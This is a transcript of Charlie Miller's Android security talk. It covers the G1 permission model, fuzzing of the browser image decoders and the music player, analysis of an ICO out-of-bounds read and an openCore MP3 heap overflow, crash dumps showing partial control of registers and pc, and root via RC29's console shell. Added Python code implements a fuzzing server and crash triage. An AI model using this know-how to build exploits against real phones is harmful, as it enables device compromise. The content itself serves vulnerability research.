Pulling a John Connor: Defeating Android

Charlie Miller, Independent Security Evaluators, [email protected]


Transcript of Pulling a John Connor: Defeating Android

Page 1: Pulling a John Connor: Defeating Android

Pulling a John Connor: Defeating Android

Charlie Miller, Independent Security Evaluators

[email protected]

Page 2: About me

Former National Security Agency

First to hack the iPhone and Android G1 phone

Won MacBook Air at Pwn2Own competition with Safari 0-day

Author of “Fuzzing for Software Security Testing and Quality Assurance”

Author of “The Mac Hacker's Handbook” (due out in a few weeks)

Page 3: Outline

Phone hacking

Android security model

Attack surface

Bug hunting

Exploit dev

After access is achieved

Page 4: Smart phone hacking is fun!

Small but capable computers

Always on

Always connected to the Internet (Wi-Fi, EDGE, 3G)

Cellular capabilities

Page 5: Personal information

Contacts

Voicemail

Pictures and movies

Web credentials and cookies

Email and text messages

Calendar and events

GPS information

Page 6: Good hacker asset

“Smart phone DOS”

Instant financial gain: 1-900 numbers, text messages, etc.

GPS (contrast with a random compromised box on the Internet)

Listening device

Circumvent network security protections

Page 7: Smart phone DDOS

Page 8: Out of band communication

Page 9: Issues for defense

Typically no AV on phones

NIDS can be avoided with SMS

Hard to determine a phone has been compromised

Tricky forensics

Phones go to Starbucks for a break (they roam off the network you monitor)

Page 10: Android basics

Open source, free, mobile platform

One production phone runs it, the T-Mobile G1

Consists of OS, middleware, some applications

Linux kernel

WebKit-based browser

Page 11: Smart phone

3G / WiFi / Bluetooth

Web browser

SMS/MMS messaging

Audio/video player

AOL IM client

GPS, integration with Google Maps...

etc.

Page 12: Security Architecture

Linux - traditional user id

Fine grained access controls

Page 13: Linux based controls

Each application gets its own UID (unless specifically shared)

Application data is stored such that it is readable/writable only by that user (unless specifically shared)

# ps
...
radio     81    23  101936 19552  ffffffff afe0c534 S com.android.phone
app_4     85    23  98352  19120  ffffffff afe0c534 S android.process.acore
app_8     106   23  93732  14564  ffffffff afe0c534 S com.google.process.gapps
app_11    119   23  100048 14992  ffffffff afe0c534 S com.android.mms
app_0     131   23  90540  14232  ffffffff afe0c534 S com.android.alarmclock
app_3     139   23  91668  15076  ffffffff afe0c534 S android.process.media
app_1     164   23  117732 25984  ffffffff afe0b23c R com.android.browser
app_18    308   23  93496  16016  ffffffff afe0c534 S net.gimite.nativeexe
app_19    701   23  91388  14448  ffffffff afe0c534 S charlie.mygps
media     4908  1   17280  4064   ffffffff afe0b45c S /system/bin/mediaserver

Every app process runs under its own app_N user (the browser is app_1) and all of them share the same parent (PPID 23); the phone and media daemons run as dedicated system users, radio and media.

Page 14: Access controls

Applications have install-time permissions associated with them

The user is informed what permissions the app will require and may accept or reject (accept all of them or do not install)

“pm list permissions” enumerates the permissions the system knows about

Calling an API without the needed permission (typically) throws a SecurityException

Page 15: Browser permissions

$ ./adb pull /system/app/Browser.apk .
$ ./aapt dump xmltree Browser.apk AndroidManifest.xml | grep 'permission\.' | cut -f2 -d\"
com.google.android.googleapps.permission.GOOGLE_AUTH
android.permission.ACCESS_COARSE_LOCATION
android.permission.ACCESS_DOWNLOAD_MANAGER
android.permission.ACCESS_FINE_LOCATION
android.permission.ACCESS_NETWORK_STATE
android.permission.ACCESS_WIFI_STATE
com.android.launcher.permission.INSTALL_SHORTCUT
android.permission.INTERNET
android.permission.WAKE_LOCK

Whoever exploits the browser inherits exactly this set: network access and both location permissions, and nothing that is not on the list.

Page 16: Permissions in action

After browser exploit (a shell running as the browser's UID):

$ id
uid=10001(app_1) gid=10001(app_1) groups=3003(inet)

$ ls /data
opendir failed, Permission denied
$ ls /data/data/com.android.providers.telephony/databases/
opendir failed, Permission denied

$ logcat
Unable to open log device '/dev/log/main': Permission denied

The inet group gives the network; other applications' data (here the telephony provider's databases) and the system log are off limits to app_1.

Page 17: Application Development

SDK with emulator freely available

All development done in Java

Only signed .apk (Java apps) may be run

May use a self-signed certificate (the signature ties an app to a developer key; it does not vouch for the app)

Apps may run in the background

Page 18: C and Android

Can write C/C++ apps with a gcc ARM cross-compiler

Some issues with the non-standard libc (bionic)

Can’t do this in a Google supported way

Debugging sucks, the SDK “debugger” is a Java debugger

$ ./arm-2007q3/bin/arm-none-linux-gnueabi-gcc -static -o hello hello.c
$ file hello
hello: ELF 32-bit LSB executable, ARM, version 1 (SYSV), for GNU/Linux 2.6.14, statically linked, for GNU/Linux 2.6.14, not stripped

# chmod 700 /data/busybox/hello
# /data/busybox/hello
Hello world

Page 19: Dynamically linking is harder

Download and build the Android source code (including bionic)

Use the prebuilt toolchain (for Linux or Mac OS X)

Use the “agcc” wrapper to set all the flags you need

Get it from: http://plausible.org/andy/agcc

$ ./arm-2007q3/bin/arm-none-linux-gnueabi-gcc -o hello hello.c
# /data/busybox/hello
/data/busybox/hello: not found

$ ./agcc.pl -o hello hello.c
# /data/busybox/hello
hi

The “not found” is not about the binary itself: a glibc-toolchain binary names /lib/ld-linux.so.3 as its ELF interpreter, which does not exist on Android (bionic's dynamic linker is /system/bin/linker), so the kernel refuses to exec it. agcc links against bionic with the right interpreter.

Page 20: Tale of firmwares

RC19 - original factory install (old WebKit bug)

RC28 - a few people got this before RC29 rolled out

RC29 - fixed WebKit bug, had local root bug

RC30 - no more root

1.1/RC33 - feature upgrade, all bugs fixed ;)

RC7 - UK version of RC29

RC8 - UK version of RC30

ADP1 - Android Dev Phone 1.0, ~RC28?

Page 21: Flashing

Download firmware

https://android.clients.google.com/updates/signed-kila-ota-115247-prereq.TC4-RC19+RC28.zip

https://android.clients.google.com/updates/signed-RC30-from-RC29-fat.1582cace.zip

Put firmware on SD card as update.zip

Hold Home+End keys to enter system recovery

Alt-S to start installing firmware

http://forum.xda-developers.com/showthread.php?t=466455

Found by DarkRift (January 2009)

Page 22: Rooting your own phone

Flash the phone with RC29

Exploit the local privilege escalation bug

init.rc:

service console /system/bin/sh
    console

(an init service with no user directive runs as root, so RC29 ships a root shell attached to the console)

Upgrade to modified latest firmware

See: http://android-dls.com/wiki/index.php for details

Page 23: Attack surface

Server side

Client side

Page 24: Server side

Bluetooth, wireless, network stack, etc.

Nothing listening on TCP/UDP :(

Sometimes you’ll see port 5555 - Android Debug Bridge (adb)

# /data/busybox/netstat -an
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address           Foreign Address         State
tcp        0      0 127.0.0.1:5037          0.0.0.0:*               LISTEN
tcp        0      0 0.0.0.0:5555            0.0.0.0:*               LISTEN
tcp        0      0 10.0.2.15:5555          10.0.2.2:50587          ESTABLISHED

(This listing is from the emulator, whose guest address is 10.0.2.15; the 0.0.0.0:5555 listener is adbd accepting connections over TCP rather than USB, and it is only there when adbd runs in that mode.)

Page 25: Client side - much nicer

Web browser

Email client

IM client

SMS/MMS

Multimedia player

Android Market apps

etc.

Page 26: Java - safety?

In theory these are all Java applications, and thus should be immune to memory corruption

However, the JVM is built on top of many C/C++ libraries

Some API functions pass data to C/C++ daemons for processing (media playback, for one, goes to mediaserver)

Page 27: Android libraries

Bionic - custom libc implementation

openCore - multimedia functionality

SGL - image rendering

WebKit - HTML, JS rendering

All this is open source and C/C++

Page 28: Bug hunting

Static analysis

Dynamic analysis

Page 29: Static Analysis

Source code freely available

http://source.android.com/download

Can build, read, run through tools, etc.

Page 30: Browser File Formats

libsgl code is interesting (and buggy)

From external/skia/libsgl/ports/SkImageDecoder_Factory.cpp

static const CodecFormat gPairs[] = {
    { SkImageDecoder_GIF_Factory,  SkImageDecoder::kGIF_Format },
    { SkImageDecoder_PNG_Factory,  SkImageDecoder::kPNG_Format },
    { SkImageDecoder_ICO_Factory,  SkImageDecoder::kICO_Format },
    { SkImageDecoder_WBMP_Factory, SkImageDecoder::kWBMP_Format },
    { SkImageDecoder_BMP_Factory,  SkImageDecoder::kBMP_Format },
    { SkImageDecoder_JPEG_Factory, SkImageDecoder::kJPEG_Format }
};

Each of these six decoders runs inside the browser process on any image a page embeds, so each one is remote attack surface.

Page 31: Read the source

Here is an indication of the code quality, from external/skia/libsgl/images/SkImageDecoder_libico.cpp

bool SkICOImageDecoder::onDecode(SkStream* stream, SkBitmap* bm,
                                 SkBitmap::Config pref, Mode mode)
...
    if (stream->read((void*)buf, length) != length) {
        return false;
    }
...
    int offset = read4Bytes(buf, 18 + i*16);
    int bitCount = read2Bytes(buf, offset+14);

offset comes straight out of the file's icon directory entry and is used as an index into the length-byte buffer without ever being compared against length (and it is a signed int, so large values index backwards), so a crafted .ico makes the decoder read outside buf.
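As an added example (not code from the deck or from Skia), here is the same field walk done with the check the decoder omits, plus a helper that reports which index the unchecked code would touch for a given file; it is useful for sorting fuzzed .ico cases before running them. The sample bytes are constructed inline, and the ICO/BMP layout used (6-byte directory, 16-byte entries from offset 6 with the image offset at +12, bit count at +14 of the BITMAPINFOHEADER) is taken from the file format, not from the slide.

```python
import struct

# Added example, not the deck's or Skia's code: bounds-checked reads of the
# ICO fields that SkICOImageDecoder::onDecode pulls out of the file.
# Layout (from the ICO/BMP formats, assumed here):
#   bytes 0-5   ICONDIR: reserved u16, type u16, count u16
#   bytes 6+    ICONDIRENTRY x count, 16 bytes each; image offset at entry+12,
#               i.e. file offset 18 + i*16 (the expression in the Skia source)
#   at offset   BITMAPINFOHEADER; its bit count u16 sits at +14


class Truncated(ValueError):
    """A field lies (partly) outside the buffer."""


def read2(buf, off):
    # Unlike read2Bytes() in the decoder, refuse any read not inside buf.
    if off < 0 or off + 2 > len(buf):
        raise Truncated("u16 at %d outside %d-byte buffer" % (off, len(buf)))
    return struct.unpack_from("<H", buf, off)[0]


def read4(buf, off):
    if off < 0 or off + 4 > len(buf):
        raise Truncated("u32 at %d outside %d-byte buffer" % (off, len(buf)))
    return struct.unpack_from("<I", buf, off)[0]


def ico_bitcounts(buf):
    """Bit depth of every icon in the file, checking each file-controlled
    offset before it is used as an index (what the Skia snippet skips)."""
    count = read2(buf, 4)
    depths = []
    for i in range(count):
        offset = read4(buf, 18 + i * 16)     # attacker controlled
        depths.append(read2(buf, offset + 14))
    return depths


def safe_bitcounts(buf):
    """ico_bitcounts() with the rejection turned into a None result."""
    try:
        return ico_bitcounts(buf)
    except Truncated:
        return None


def unchecked_reads(buf):
    """For triage: the index each entry makes the *unchecked* decoder read
    (offset is a signed int there, so 0x80000000 and up go negative) and
    whether it is inside the buffer. Returns [(entry, index, in_bounds)]."""
    out = []
    count = read2(buf, 4) if len(buf) >= 6 else 0
    for i in range(count):
        field = 18 + i * 16
        if field + 4 > len(buf):
            break
        offset = struct.unpack_from("<i", buf, field)[0]   # signed, like the C++
        idx = offset + 14
        out.append((i, idx, 0 <= idx and idx + 2 <= len(buf)))
    return out


def make_ico(image_offset, bitcount=32):
    """Constructed one-entry .ico (sample data, not a real icon): directory,
    one 16x16 entry whose image offset field is image_offset, then a
    40-byte BITMAPINFOHEADER. A well-formed file uses image_offset=22."""
    icondir = struct.pack("<HHH", 0, 1, 1)
    entry = struct.pack("<BBBBHHII", 16, 16, 0, 0, 1, bitcount, 40, image_offset)
    dib = struct.pack("<IiiHH", 40, 16, 32, 1, bitcount) + b"\0" * 26
    return icondir + entry + dib


if __name__ == "__main__":
    good = make_ico(22)
    print(ico_bitcounts(good), unchecked_reads(good))
    bad = make_ico(0xFFFFFFF0)                 # offset field past the file
    print(safe_bitcounts(bad), unchecked_reads(bad))
```

unchecked_reads() mirrors the decoder's signed arithmetic on purpose: a case whose index comes back negative or past the end is exactly the kind of file worth feeding to the real decoder under logcat.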

Page 32: Fuzzing

Android comes with an emulator

QEMU-based, ARM processor emulated

Full Android stack

Not updated as frequently as devices

The WebKit bug still crashes the emulator

Can fuzz emulator or device

Page 33: Emulator

Fuzzing the emulator is convenient

Don’t need a device

Can stick it in VMware and snapshot it

Can even do exploit dev on it - to a point

If things get hosed do: ./emulator -wipe-data

Page 34: ADB

Android Debug Bridge

Allows you to push files on and off the emulator/device

Gives a shell on the emulator/device

Gives root on the emulator, “shell” on the device

Can watch system logs

Page 35: ADB in action

>adb devices
List of devices attached
HT845GZ52307    device

>adb shell
$ id
uid=2000(shell) gid=2000(shell) groups=1003(graphics),1004(input),1007(log),1011(adb),3003(inet)

>adb logcat
D/KeyguardViewMediator(   52): wakeWhenReadyLocked(82)
D/KeyguardViewMediator(   52): handleWakeWhenReady(82)
D/KeyguardViewMediator(   52): pokeWakelock(5000)
D/SurfaceFlinger(   52): Screen about to return, flinger = 0x14f7e0
D/dalvikvm(   52): GC freed 19203 objects / 913184 bytes in 256ms
V/WifiMonitor(   52): Event [CTRL-EVENT-DRIVER-STATE STARTED]

Note the log group: the adb shell user can read logcat, which an app UID such as app_1 on the earlier slide cannot.

Page 36: Fuzzing the browser

Fuzzing HTTP, JavaScript, images, etc.

Can be done with an HTML meta-refresh page: the browser reloads it every 2 seconds and the server hands back the next test case each time

print "<html><body> <META HTTP-EQUIV=\"Pragma\" CONTENT=\"no-cache\">"
    . "<meta http-equiv=\"refresh\" content=\"2\"> Image $test_case_number : "
    . "<img src=\"/images/" . sprintf("%08d", $test_case_number) . ".$image_type\"> </body></html>";

Page 37: Watching for crashes

Use logcat to watch for crashes (the I/DEBUG lines from debuggerd carry the process name, signal, fault address, registers and backtrace)

Examples coming
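The server side of the loop described on the last two slides, as an added example that is not the deck's own harness: a Python 3 HTTP server that returns the meta-refresh page for the next case and a mutated copy of a seed image for each /images/NNNNNNNN.ext request. The mutation is seeded by the case number, so the file name that appears next to a crash in logcat is enough to regenerate the exact bytes. The /images/ prefix and the 8-digit naming come from the slide; everything else (port 8000, the mutation strategy, the handler) is this example's choice.

```python
import random
import sys
from http.server import BaseHTTPRequestHandler, HTTPServer

# Added example, not the deck's harness: the server side of the meta-refresh
# fuzzing loop. The browser loads /, which embeds one mutated image and
# reloads itself every 2 seconds; each reload is served the next case number.
# Case numbers seed the mutation, so a crashing case is reproducible by name.

IMAGE_DIR = "/images/"          # URL prefix used on the slide


def image_name(case_no, image_type):
    """Zero-padded name, matching the slide's sprintf("%08d", ...)."""
    return "%08d.%s" % (case_no, image_type)


def page_html(case_no, image_type, refresh_seconds=2):
    """The self-reloading page; Pragma: no-cache keeps the browser fetching."""
    return ('<html><body><META HTTP-EQUIV="Pragma" CONTENT="no-cache">'
            '<meta http-equiv="refresh" content="%d">'
            'Image %d : <img src="%s%s"></body></html>'
            % (refresh_seconds, case_no, IMAGE_DIR, image_name(case_no, image_type)))


def case_from_url(url):
    """Recover the case number from an image URL seen in a log line."""
    name = url.rsplit("/", 1)[-1]
    return int(name.split(".", 1)[0])


def mutate(seed_bytes, case_no, flips=None):
    """Byte-flip mutation of the seed file, deterministic per case number.
    flips defaults to about 1% of the file; boundary values are favoured
    because length and offset fields are where decoders trip."""
    rng = random.Random(case_no)
    data = bytearray(seed_bytes)
    n = flips if flips is not None else max(1, len(data) // 100)
    for _ in range(n):
        pos = rng.randrange(len(data))
        data[pos] = rng.choice((0x00, 0xff, 0x7f, 0x80, rng.randrange(256)))
    return bytes(data)


class FuzzHandler(BaseHTTPRequestHandler):
    seed = b""                  # filled in from the command line below
    image_type = "ico"
    next_case = 0

    def do_GET(self):
        if self.path.startswith(IMAGE_DIR):
            body = mutate(self.seed, case_from_url(self.path))
            ctype = "application/octet-stream"
        else:
            FuzzHandler.next_case += 1          # every refresh is a new case
            body = page_html(FuzzHandler.next_case, self.image_type).encode()
            ctype = "text/html"
        self.send_response(200)
        self.send_header("Content-Type", ctype)
        self.send_header("Content-Length", str(len(body)))
        self.end_headers()
        self.wfile.write(body)


if __name__ == "__main__":
    # usage: fuzz_server.py seed.ico [port]; point the phone's browser at it
    with open(sys.argv[1], "rb") as f:
        FuzzHandler.seed = f.read()
    FuzzHandler.image_type = sys.argv[1].rsplit(".", 1)[-1]
    port = int(sys.argv[2]) if len(sys.argv) > 2 else 8000
    HTTPServer(("", port), FuzzHandler).serve_forever()
```

Run it with a small valid seed of the format under test and watch adb logcat on the other side; when a tombstone appears, mutate(seed, case_from_url(url)) rebuilds the offending file without having to have kept every case on disk.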

Page 38: Demo: Fuzzing .ico

Page 39: Fuzzing Music Player

Fuzzing other apps requires actually launching them from the command line and directing them to the fuzzed test cases

Remember the apps are Java bytecode

Need to launch inside the virtual machine (via the activity manager, am)

Page 40: Command line

Need action and component for the application

Get this from AndroidManifest.xml in the .apk file

$ ./aapt dump xmltree Music.apk AndroidManifest.xml | grep 'intent.action' | sort -u
A: android:name(0x01010003)="android.intent.action.CREATE_SHORTCUT" (Raw: "android.intent.action.CREATE_SHORTCUT")
A: android:name(0x01010003)="android.intent.action.EDIT" (Raw: "android.intent.action.EDIT")
A: android:name(0x01010003)="android.intent.action.MAIN" (Raw: "android.intent.action.MAIN")
A: android:name(0x01010003)="android.intent.action.MEDIA_BUTTON" (Raw: "android.intent.action.MEDIA_BUTTON")
A: android:name(0x01010003)="android.intent.action.PICK" (Raw: "android.intent.action.PICK")
A: android:name(0x01010003)="android.intent.action.SEARCH" (Raw: "android.intent.action.SEARCH")
A: android:name(0x01010003)="android.intent.action.VIEW" (Raw: "android.intent.action.VIEW")

$ ./aapt dump xmltree Music.apk AndroidManifest.xml | grep -B3 VIEW | grep name | grep -v VIEW
A: android:name(0x01010003)="StreamStarter" (Raw: "StreamStarter")

Page 41: Launch the app!

#!/usr/bin/env python
import sys, os, time, subprocess

# usage: launch.py <milliseconds to watch the log> <URI of the fuzzed test case>
# Popen does not expand ~, so expand it here rather than in the string
adb = os.path.expanduser("~/android/android-sdk-mac_x86-1.0_r2/tools/adb")
logdump = [adb, "logcat", "-d"]
# start the Music app's StreamStarter activity on the test case
cmd = [adb, "shell", "am", "start",
       "-a", "android.intent.action.VIEW",
       "-n", "com.android.music/com.android.music.StreamStarter",
       sys.argv[2]]

# Clear the system log so only this test case's output is collected
os.system(adb + " logcat -c")
log = ""
cmdout = subprocess.Popen(cmd, stdout=subprocess.PIPE).stdout
start = 0
testtime = int(sys.argv[1]) / 1000.0
# dump the log once a second until the test time is up; a native crash
# shows up as I/DEBUG lines from debuggerd
while time.time() - start < testtime or start == 0:
    log = subprocess.Popen(logdump, stdout=subprocess.PIPE).communicate()[0]
    if start == 0:
        start = time.time()
    time.sleep(1)
print(log)

Page 42: Demo: Fuzzing Music

Page 43: An exploitable bug in RC33

Notified Google on Jan 21, 2009

17 days ago

Still a 0-day in G1 phones

In libpvplayer.so (openCore)

In pvmp3_huffman_parsing() from pvmp3_huffman_parsing.cpp

Page 44: The bug

...
for (i = 0; (uint32)i < (grInfo->big_values << 1); i += 2)
...
grBits = part2_start + grInfo->part2_3_length;

while ((pMainData->usedBits < grBits) &&
       (i < FILTERBANK_BANDS*SUBBANDS_NUMBER - 4))
{
    pvmp3_huffman_quad_decoding(h, &is[i], pMainData);
    i += 4;
}

if ((pMainData->usedBits < grBits) &&
    (i < FILTERBANK_BANDS*SUBBANDS_NUMBER))
{
    pvmp3_huffman_quad_decoding(h, &is[i], pMainData);
    i += 4;
...

Page 45: The bug (cont)

is is a uint array of size FILTERBANK_BANDS*SUBBANDS_NUMBER

pvmp3_huffman_quad_decoding writes dwords to is[i], is[i+1], is[i+2], is[i+3]

grInfo->part2_3_length is controllable, so usedBits < grBits stays true for as long as the attacker wants

Get a 2 dword overflow: the while loop stops at i < N-4, but the trailing if only checks i < N, so when i reaches N-2 (i is always even after the pair loop) the last quad write lands on is[N] and is[N+1]
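To see exactly how far the loops on the previous slide can write, here is an added model of their index arithmetic (not the deck's code, and not the decoder itself). Bit accounting is reduced to "how many more quads the granule has bits for", since part2_3_length is attacker controlled anyway; the size of is[] is assumed to be 18*32 = 576, one granule of MP3 frequency lines, because the constants' values are not on the slide.

```python
# Added example, not the deck's code: a model of the index arithmetic in the
# pvmp3_huffman_parsing() loops. Bit accounting is reduced to "how many quads
# the granule still has bits for", since part2_3_length (and so the
# usedBits < grBits test) is attacker controlled. The size of is[] is
# assumed to be 18*32 = 576.

N = 18 * 32      # FILTERBANK_BANDS * SUBBANDS_NUMBER, assumed values


def quad_loop_writes(big_values, quads_with_bits, n=N, fixed=False):
    """Indices written into is[] by the pair loop followed by the two count1
    quad loops. fixed=True replaces the trailing 'i < n' with 'i + 4 <= n'."""
    assert 0 <= big_values * 2 <= n, "pair loop bound is outside this model"
    writes = []
    i = 0
    while i < (big_values << 1):                 # big-values region: pairs
        writes += [i, i + 1]
        i += 2
    left = quads_with_bits                       # stands in for usedBits < grBits
    while left > 0 and i < n - 4:                # the while loop as written
        writes += [i, i + 1, i + 2, i + 3]
        i += 4
        left -= 1
    tail_ok = (i + 4 <= n) if fixed else (i < n)   # the trailing if
    if left > 0 and tail_ok:
        writes += [i, i + 1, i + 2, i + 3]
    return writes


def overflow_dwords(big_values, quads_with_bits, fixed=False):
    """How many dwords past the end of is[] the sequence writes."""
    w = quad_loop_writes(big_values, quads_with_bits, fixed=fixed)
    return max(0, max(w) - (N - 1)) if w else 0


def worst_case(fixed=False):
    """Scan every big_values the pair loop tolerates, with unlimited bits."""
    return max(overflow_dwords(bv, N, fixed=fixed) for bv in range(N // 2 + 1))


if __name__ == "__main__":
    for bv in (0, 1, 2, 287):
        print("big_values=%3d -> overflow %d dwords (fixed: %d)"
              % (bv, overflow_dwords(bv, N), overflow_dwords(bv, N, fixed=True)))
    print("worst case:", worst_case())
```

The scan shows the pattern the slide describes: whenever big_values is odd, i arrives at N-2 after the while loop, the trailing if still passes, and the next quad write lands two dwords past the array; with the bound tightened to i + 4 <= n the worst case is zero.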

Page 46: Exploitable?

I/DEBUG ( 9113): *** *** *** *** *** *** *** *** *** *** *** *** *** *** *** ***
I/DEBUG ( 9113): Build fingerprint: 'generic/generic/generic/:1.0/119366/119366:sdk/test-keys'
I/DEBUG ( 9113): pid: 9221, tid: 9226  >>> /system/bin/mediaserver <<<
I/DEBUG ( 9113): signal 11 (SIGSEGV), fault addr e80e3cd0
I/DEBUG ( 9113):  r0 00000081  r1 00000003  r2 afe38678  r3 00043460
I/DEBUG ( 9113):  r4 e80e3cc4  r5 00000001  r6 00000018  r7 afe3863c
I/DEBUG ( 9113):  r8 40207cfc  r9 afe35a88  10 a9d26e8d  fp 00000001
I/DEBUG ( 9113):  ip afd010b0  sp 40307cc8  lr afe0da58  pc afe0a4e6  cpsr 80000030
I/DEBUG ( 9113):          #00  pc afe0a4e6  /system/lib/libc.so
I/DEBUG ( 9113):          #01  pc afd0095e  /system/lib/libstdc++.so
I/DEBUG ( 9113):          #02  pc a7172aca  /system/lib/libpvplayer.so

Fuzzed mp3, crash in mediaserver

Crashes while checking safe unlink

Corrupt heap meta-data: the fault address e80e3cd0 is r4+0xc, so libc (entered from libstdc++.so) is following a chunk pointer that the overflow replaced with garbage.

Page 47: Fuzzing greatest hits

I/DEBUG (15993): *** *** *** *** *** *** *** *** *** *** *** *** *** *** *** ***
I/ActivityManager( 51): Displayed activity com.android.music/.StreamStarter: 2173 ms
I/DEBUG (15993): Build fingerprint: 'generic/generic/generic/:1.0/119366/119366:sdk/test-keys'
I/DEBUG (15993): pid: 15994, tid: 16021  >>> /system/bin/mediaserver <<<
I/DEBUG (15993): signal 11 (SIGSEGV), fault addr fffd10e6
I/DEBUG (15993):  r0 00000087  r1 0003ac6c  r2 0000021c  r3 00000000
I/DEBUG (15993):  r4 00030740  r5 00000000  r6 fffd10da  r7 0001406c
I/DEBUG (15993):  r8 40207bbc  r9 afe35a88  10 a9d26e8d  fp 00000001
I/DEBUG (15993):  ip a7572820  sp 40407e10  lr a7159fa1  pc a7159f68  cpsr 40000030
I/DEBUG (15993):          #00  pc a7159f68  /system/lib/libpvplayer.so
I/DEBUG (15993):          #01  pc a7159f9e  /system/lib/libpvplayer.so
I/DEBUG (15993):          #02  pc a715dc40  /system/lib/libpvplayer.so
I/DEBUG (15993):          #03  pc a715d8ba  /system/lib/libpvplayer.so

fuzzed mp3, some control over r6 (the fault address fffd10e6 is r6+0xc)

Page 48: Fuzzing greatest hits

r6 (bad - we have some control) is dereferenced and the result put in r0

r0 is dereferenced and put into r3

r3 is dereferenced and put into r1

branch (jump) to r1

A chain of dependent loads starting from a partially controlled pointer and ending in an indirect branch: full control of r6, plus memory at the addresses it points to, would mean control of pc.

Page 49: Fuzzing greatest hits, FTW

I/DEBUG   (   20): *** *** *** *** *** *** *** *** *** *** *** *** *** *** *** ***
I/DEBUG   (   20): Build fingerprint: 'generic/generic/generic/:1.0/119366/119366:sdk/test-keys'
I/DEBUG   (   20): pid: 365, tid: 365  >>> com.android.browser <<<
I/DEBUG   (   20): signal 4 (SIGILL), fault addr 0027fe34
I/DEBUG   (   20):  r0 0027fdd0  r1 ac125670  r2 0027fe28  r3 001fd4c8
I/DEBUG   (   20):  r4 0027fdd0  r5 001c8888  r6 001fd44c  r7 bed8c524
I/DEBUG   (   20):  r8 001fd418  r9 4104ad1c  10 4104ad08  fp 00000000
I/DEBUG   (   20):  ip 001fd44c  sp bed8c510  lr ac05d564  pc 0027fe38  cpsr 20000010
I/DEBUG   (   20):          #00  pc 0027fe38  [heap]
I/DEBUG   (   20):          #01  pc ac05d560  /system/lib/libsgl.so

oops, the fuzzing testcase almost got control of the process by accident!

(pc is 0027fe38, inside the browser's heap, reached from libsgl.so: the image decoder jumped through a corrupted pointer into heap data, which is why the signal is SIGILL rather than SIGSEGV)
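Sorting crashes like the ones on pages 46 to 49 by hand gets old quickly, so here is an added example (not the deck's code) of a parser and first-pass triager for the I/DEBUG tombstone lines that debuggerd writes to logcat, in the format shown on these slides. The two embedded samples are the slides' own dumps from pages 47 and 49, trimmed to the lines the parser uses; the triage rules (pc in [heap] or SIGILL means a hijacked pc, otherwise name the register whose value sits just below the fault address) are this example's, not the speaker's.

```python
import re

# Added example, not the deck's code: parse the I/DEBUG tombstone that
# debuggerd writes to logcat after a native crash and give a first verdict.

LINE = re.compile(r'^I/DEBUG\s*\(\s*\d+\):\s?(.*)$')
PID = re.compile(r'pid:\s*(\d+),\s*tid:\s*(\d+)\s*>>>\s*(\S+)\s*<<<')
SIGNAL = re.compile(r'signal\s+(\d+)\s+\((\w+)\),\s*fault addr\s+([0-9a-f]{8})')
REG = re.compile(r'\b(r\d{1,2}|10|fp|ip|sp|lr|pc|cpsr)\s+([0-9a-f]{8})')
FRAME = re.compile(r'#(\d+)\s+pc\s+([0-9a-f]{8})\s+(\S+)')


def parse_tombstone(logcat_text):
    """Pull process, signal, fault address, registers and backtrace out of
    a logcat capture; lines from other tags are ignored."""
    tb = {"regs": {}, "frames": []}
    for raw in logcat_text.splitlines():
        m = LINE.match(raw.strip())
        if not m:
            continue
        body = m.group(1).strip()
        if body.startswith("pid:"):
            pm = PID.match(body)
            tb["pid"], tb["tid"], tb["process"] = int(pm.group(1)), int(pm.group(2)), pm.group(3)
        elif body.startswith("signal"):
            sm = SIGNAL.match(body)
            tb["signal"], tb["signame"] = int(sm.group(1)), sm.group(2)
            tb["fault_addr"] = int(sm.group(3), 16)
        elif body.startswith("#"):
            fm = FRAME.match(body)
            tb["frames"].append((int(fm.group(1)), int(fm.group(2), 16), fm.group(3)))
        else:
            for name, val in REG.findall(body):      # "10" is r10 in this format
                tb["regs"]["r10" if name == "10" else name] = int(val, 16)
    return tb


def nearest_register(tb, window=0x100):
    """Register whose value sits at or just below the fault address: the
    faulting instruction was most likely a load/store through it plus a
    small displacement. Returns (name, displacement) or None."""
    best = None
    for name, val in tb["regs"].items():
        if name in ("cpsr", "pc"):
            continue
        d = tb["fault_addr"] - val
        if 0 <= d < window and (best is None or d < best[1]):
            best = (name, d)
    return best


def triage(tb):
    """One-line verdict of the kind written next to the dumps on the slides."""
    top = tb["frames"][0][2] if tb["frames"] else "?"
    if tb.get("signame") == "SIGILL" or top == "[heap]":
        return "pc hijacked: executing in %s" % top
    hit = nearest_register(tb)
    if hit:
        return "%s: access through %s+0x%x in %s" % (tb["signame"], hit[0], hit[1], top)
    return "%s in %s, unclassified" % (tb.get("signame"), top)


# Samples: the slides' own dumps (page 47 and page 49), trimmed.
SAMPLE_R6 = """\
I/ActivityManager( 51): Displayed activity com.android.music/.StreamStarter: 2173 ms
I/DEBUG (15993): pid: 15994, tid: 16021  >>> /system/bin/mediaserver <<<
I/DEBUG (15993): signal 11 (SIGSEGV), fault addr fffd10e6
I/DEBUG (15993):  r0 00000087  r1 0003ac6c  r2 0000021c  r3 00000000
I/DEBUG (15993):  r4 00030740  r5 00000000  r6 fffd10da  r7 0001406c
I/DEBUG (15993):  r8 40207bbc  r9 afe35a88  10 a9d26e8d  fp 00000001
I/DEBUG (15993):  ip a7572820  sp 40407e10  lr a7159fa1  pc a7159f68  cpsr 40000030
I/DEBUG (15993):          #00  pc a7159f68  /system/lib/libpvplayer.so
I/DEBUG (15993):          #01  pc a7159f9e  /system/lib/libpvplayer.so
"""

SAMPLE_SIGILL = """\
I/DEBUG   (   20): pid: 365, tid: 365  >>> com.android.browser <<<
I/DEBUG   (   20): signal 4 (SIGILL), fault addr 0027fe34
I/DEBUG   (   20):  r0 0027fdd0  r1 ac125670  r2 0027fe28  r3 001fd4c8
I/DEBUG   (   20):  ip 001fd44c  sp bed8c510  lr ac05d564  pc 0027fe38  cpsr 20000010
I/DEBUG   (   20):          #00  pc 0027fe38  [heap]
I/DEBUG   (   20):          #01  pc ac05d560  /system/lib/libsgl.so
"""

if __name__ == "__main__":
    for sample in (SAMPLE_R6, SAMPLE_SIGILL):
        tb = parse_tombstone(sample)
        print(tb["process"], "->", triage(tb))
```

Fed the page 47 dump it reports an access through r6+0xc in libpvplayer.so, which is the "some control over r6" note on the slide; fed the page 49 dump it flags execution in [heap]. Pipe the output of the launch script above through parse_tombstone() to get this automatically for every case.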

Page 50: Exploit Dev

From an exploit perspective, the phone runs Linux on ARM

The Bionic library uses Doug Lea malloc (dlmalloc)

Can use standard shellcode (almost)

Limited by the application sandbox (you get the exploited app's UID and permissions, nothing more)

Page 51: Pulling a John Connor: Defeating Android

